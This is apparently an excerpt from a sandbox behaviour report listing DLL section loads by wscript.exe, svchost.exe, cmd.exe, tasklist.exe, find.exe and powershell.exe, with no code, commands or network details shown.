      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
      Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: slc.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dll
      Source: C:\Windows\System32\timeout.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
